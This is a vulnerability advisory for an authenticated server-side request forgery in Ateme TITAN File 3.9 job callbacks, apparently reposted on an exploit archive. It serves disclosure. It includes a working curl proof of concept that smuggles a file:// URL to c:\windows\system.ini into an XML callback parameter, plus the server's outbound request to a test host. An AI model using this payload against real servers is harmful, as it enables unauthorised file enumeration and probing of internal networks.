Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery: Posted Jul 11, 2023; Authored by LiquidWorm | Site zeroscience.mk; Ateme TITAN File version 3.9 suffers from a server-side request forgery vulnerability that allows for file enumeration.; tags | exploit; SHA-256 | effb353a9f5359aa01480c360ee3c285aae8e678818f7d46c2f3644e50c4f925; Download | Favorite | View

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery


Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration


Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.9.12.4
                  3.9.11.0
                  3.9.9.2
                  3.9.8.0

Summary: TITAN File is a multi-codec/format video transcoding
software, for mezzanine, STB and ABR VOD, PostProduction, Playout
and Archive applications. TITAN File is based on ATEME 5th Generation
STREAM compression engine and delivers the highest video quality
at minimum bitrates with accelerated parallel processing.

Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability
exists in the Titan File video transcoding software. The application
parses user supplied data in the job callback url GET parameter. Since
no validation is carried out on the parameter, an attacker can specify
an external domain and force the application to make an HTTP/DNS/File
request to an arbitrary destination. This can be used by an external
attacker for example to bypass firewalls and initiate a service, file
and network enumeration on the internal network through the affected
application.

Tested on: Microsoft Windows
           NodeJS
           Ateme KFE Software


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5781
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php


22.04.2023

--


curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
         -H "User-Agent: sunee-mode" \
         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

Call to file://C:\\windows\\system.ini returned 0

---

HTTP from Server
----------------

POST / HTTP/1.1
Host: ssrftest.zeroscience.mk
Accept: */*
Content-Type: application/xml
Content-Length: 192

<?xml version='1.0' encoding='UTF-8' ?>
<update>
   <id>0000</id>
   <name>dummy test job</name>
   <status>aborted</status>
   <progress>50</progress>
   <message>message</message>
</update>

Top Authors In Last 30 Days

Red Hat 256 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 3 files
nu11secur1ty 3 files
h00die-gr3y 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,448)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,344)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,672)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

Share This

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems